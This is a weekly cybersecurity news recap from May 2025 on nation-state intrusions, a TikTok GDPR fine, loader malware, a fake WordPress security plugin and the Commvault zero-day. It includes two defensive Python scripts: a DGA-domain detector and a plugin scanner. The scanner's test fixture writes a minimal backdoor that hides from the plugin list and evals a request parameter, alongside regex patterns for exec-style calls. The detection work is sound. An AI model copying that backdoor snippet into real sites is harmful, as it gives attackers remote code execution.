Weekly Cybersecurity Recap - 5 May 2025

Major Cyber Breaches, Vulnerabilities & Industry Updates


    Introduction:

    This week’s cybersecurity landscape brought a wave of critical developments, from nation-state espionage and corporate breaches to evolving malware tactics. Iranian state-sponsored hackers maintained covert access to Middle Eastern critical infrastructure for nearly two years. TikTok was fined €530 million for GDPR violations, and Commvault confirmed a zero-day Azure breach. Meanwhile, malware campaigns are growing stealthier, and SANS laid out the top cyber threats for 2025. Here's your categorized breakdown of the week's most important stories:

    Nation-State Threats & Espionage

    Iranian Hackers Maintain 2-Year Access to Middle East CNI via VPN Flaws and Malware

    A long-term intrusion into a critical national infrastructure (CNI) organization in the Middle East, lasting nearly two years, has been attributed to an Iranian state-sponsored threat group. The activity ran from May 2023 to February 2025 and combined extensive espionage with suspected network prepositioning, a tactic used to retain persistent access and strategic leverage for later use. The tradecraft aligns with Lemon Sandstorm (aka Rubidium, Parisite, Pioneer Kitten, UNC757), a known Iranian actor whose initial access, as the headline notes, came through VPN flaws followed by custom malware.

    Regulation & Data Privacy

    TikTok Slammed With €530 Million GDPR Fine for Sending E.U. Data to China

    Ireland's Data Protection Commission fined TikTok €530 million ($601 million) for transferring European user data to China in violation of the GDPR. The fine concludes an investigation opened in 2021 into the platform's compliance with EU data transfer requirements, and it reinforces growing regulatory scrutiny of how technology companies handle cross-border data flows.

    Malware & Exploits

    MintsLoader Drops GhostWeaver via Phishing, ClickFix — Uses DGA, TLS for Stealth Attacks

    The malware loader MintsLoader is being used to deliver GhostWeaver, a PowerShell-based RAT, through obfuscated multi-stage chains. The loader performs sandbox evasion, generates its C2 domains with a domain generation algorithm (DGA), and talks to its HTTP-based C2; distribution relies on phishing emails, ClickFix social-engineering lures (which trick the user into pasting and running a command) and drive-by downloads. Payloads such as StealC and a modified BOINC client have also been tied to MintsLoader campaigns since early 2023.
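    Because MintsLoader resolves its C2 through a DGA, the practical defensive check is to look for DGA-like names in DNS query logs. The following is an added example written for this recap, not code from the original page or from any vendor report: it scores the registrable label of each queried name on length, Shannon entropy, vowel ratio and digit ratio, and flags names that trip at least three of the four heuristics. The log lines are constructed, the thresholds are assumptions tuned for this sample, and the registrable-label extraction is a naive second-level split (a production version would use the public suffix list).

```python
import math
from collections import Counter

# Constructed DNS query log lines (not from the page or from any real campaign).
# Format: <timestamp> <client> <qtype> <qname>
SAMPLE_LOG = """\
2025-05-01T09:00:01Z 10.0.0.5 A www.example.com
2025-05-01T09:00:02Z 10.0.0.5 A mail.google.com
2025-05-01T09:00:03Z 10.0.0.7 A cdn.jsdelivr.net
2025-05-01T09:00:04Z 10.0.0.9 A x7k2q9vb3m1z.top
2025-05-01T09:00:05Z 10.0.0.9 A q8w1e5r7t2y9u4i.xyz
2025-05-01T09:00:06Z 10.0.0.5 A updates.microsoft.com
2025-05-01T09:00:07Z 10.0.0.9 A zk4jq9x2n7vbp1.net
2025-05-01T09:00:08Z 10.0.0.7 A static.cloudflareinsights.com
"""


def registrable_label(fqdn: str) -> str:
    """Naive second-level label: 'www.example.com' -> 'example'.
    Assumption: two-label suffixes such as 'co.uk' are not handled here."""
    parts = fqdn.lower().rstrip(".").split(".")
    return parts[-2] if len(parts) >= 2 else parts[0]


def shannon_entropy(s: str) -> float:
    """Bits per character; random-looking labels score close to log2(len)."""
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values()) if n else 0.0


def vowel_ratio(s: str) -> float:
    letters = [ch for ch in s if ch.isalpha()]
    return sum(ch in "aeiou" for ch in letters) / len(letters) if letters else 0.0


def digit_ratio(s: str) -> float:
    return sum(ch.isdigit() for ch in s) / len(s) if s else 0.0


def dga_score(label: str) -> int:
    """Count of heuristics tripped (0..4). Thresholds are assumptions for this sample."""
    score = 0
    score += len(label) >= 10            # DGAs rarely produce short labels
    score += shannon_entropy(label) >= 3.3  # near-uniform character use
    score += vowel_ratio(label) < 0.25   # pronounceable words have more vowels
    score += digit_ratio(label) >= 0.2   # digits mixed into the label
    return score


def flag_dga_queries(log_text: str, threshold: int = 3) -> list[tuple[str, str]]:
    """Return (client, qname) pairs whose registrable label scores >= threshold."""
    flagged = []
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) != 4:
            continue  # skip malformed lines rather than crash on them
        _ts, client, _qtype, qname = fields
        if dga_score(registrable_label(qname)) >= threshold:
            flagged.append((client, qname))
    return flagged


if __name__ == "__main__":
    for client, qname in flag_dga_queries(SAMPLE_LOG):
        print(f"{client} -> {qname} (score {dga_score(registrable_label(qname))})")
```

    Note the legitimate but long name "cloudflareinsights": it trips the length and entropy heuristics and scores 2, which is why a single heuristic is never enough and the example requires three. In a real deployment the score is a triage signal to be joined with NXDOMAIN rate per client and first-seen age of the domain, not a verdict on its own.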

    Fake Security Plugin on WordPress Enables Remote Admin Access for Attackers

    A malicious plugin named “WP-antymalwary-bot.php” is being planted on WordPress sites disguised as a security tool, giving attackers a backdoor. It hides itself from the plugin list in the admin dashboard, maintains persistence, and allows remote code execution, so site administrators should not rely on the dashboard alone and should check the plugins directory on disk.
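    The practical check is a filesystem scan of wp-content/plugins, since a plugin that hides itself from the dashboard is still visible on disk. The script below is an added example for this recap, not the page's or any vendor's code: it reports any file with the name given in the report and additionally scores PHP files against a few generic indicators common to backdoor plugins (the `all_plugins` filter used to hide from the plugin list, dynamic code execution, request parameters fed to an exec-style function, and scheduled-event persistence). Those indicators are assumptions about typical backdoor tradecraft, not details the report gives about this specific plugin, and the fixture plugin contents are constructed for the demonstration.

```python
import re
import tempfile
from pathlib import Path

# The only item taken from the report is the file name; matched case-insensitively.
KNOWN_BAD_FILENAMES = {"wp-antymalwary-bot.php"}

# Generic backdoor indicators (assumptions, not details from the report).
INDICATORS = {
    "hides_from_plugin_list": re.compile(r"add_filter\s*\(\s*['\"]all_plugins['\"]"),
    "dynamic_code_exec": re.compile(r"\b(?:eval|create_function)\s*\(|\bbase64_decode\s*\("),
    "request_param_to_exec": re.compile(
        r"\b(?:eval|system|exec|shell_exec|passthru)\s*\([^;]*\$_(?:GET|POST|REQUEST|COOKIE)\b"
    ),
    "scheduled_persistence": re.compile(r"wp_schedule_event\s*\("),
}


def scan_php_file(path: Path) -> list[str]:
    """Return the list of indicator names that fire for one PHP file."""
    hits = []
    if path.name.lower() in KNOWN_BAD_FILENAMES:
        hits.append("known_bad_filename")
    try:
        text = path.read_text(errors="replace")
    except OSError:
        return hits  # unreadable file: still report the name match if any
    for name, rx in INDICATORS.items():
        if rx.search(text):
            hits.append(name)
    return hits


def scan_plugins(plugins_root: Path, min_hits: int = 2) -> dict[str, list[str]]:
    """Scan every .php file under the plugins directory.

    A single generic hit is noise (wp_schedule_event is legitimate in many plugins),
    so generic indicators need min_hits to fire; the known file name is always reported.
    """
    findings = {}
    for php in sorted(plugins_root.rglob("*.php")):
        hits = scan_php_file(php)
        if "known_bad_filename" in hits or len(hits) >= min_hits:
            findings[str(php.relative_to(plugins_root))] = hits
    return findings


def build_fixture() -> Path:
    """Constructed plugins directory: one benign plugin, one backdoor-style file.
    The backdoor content is illustrative only and is not the real plugin's code."""
    root = Path(tempfile.mkdtemp(prefix="wp-plugins-"))
    (root / "hello-dolly").mkdir()
    (root / "hello-dolly" / "hello.php").write_text(
        "<?php\n/* Plugin Name: Hello Dolly */\n"
        "add_action('admin_notices', 'hello_dolly');\n"
        "function hello_dolly() { echo 'Hello'; }\n"
    )
    (root / "WP-antymalwary-bot.php").write_text(
        "<?php\n/* Plugin Name: WP Antimalware Bot */\n"
        "add_filter('all_plugins', function ($p) { unset($p['WP-antymalwary-bot.php']); return $p; });\n"
        "if (isset($_REQUEST['cmd'])) { eval($_REQUEST['cmd']); }\n"
    )
    return root


if __name__ == "__main__":
    for rel, hits in scan_plugins(build_fixture()).items():
        print(f"{rel}: {', '.join(hits)}")
```

    Run it against a real install with `scan_plugins(Path("/var/www/html/wp-content/plugins"))`. Treat generic hits as leads for manual review rather than proof of compromise; the file-name match is the only indicator the report itself supports.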

    Cloud & Infrastructure Security

    Commvault Confirms Hackers Exploited CVE-2025-3928 as Zero-Day in Azure Breach

    Commvault disclosed that an unknown state-sponsored actor breached its Microsoft Azure environment by exploiting CVE-2025-3928 as a zero-day. After being notified by Microsoft on February 20, the company said no customer data was accessed; it has since rotated credentials and hardened the affected environment.

    Industry Disruptions

    UK Retailers Co-op, Harrods and M&S Struggle With Cyberattacks

    Major UK retailers are facing operational disruption due to ongoing cyberattacks. M&S was impacted over Easter weekend, suspending online services while stores remained open. Co-op and Harrods are also racing to restore normalcy, highlighting sector-wide vulnerability.

    Reports & Insights

    SANS Top 5: Cyber Has Busted Out of the SOC

    This year’s SANS session at RSA laid out the top threats for 2025: cloud authorization sprawl, attacks on ICS, and the limits of cloud logging and of current AI usage. Addressing these issues will require not only technical measures but also leadership-level strategy and cross-organizational collaboration.

    Zero-day exploitation drops slightly from last year, Google report finds

    According to Google's Threat Intelligence Group, zero-day exploitation has declined slightly thanks to improved vendor security practices. While this trend is promising, the threat of zero-days remains a pressing issue requiring continued vigilance across the industry.
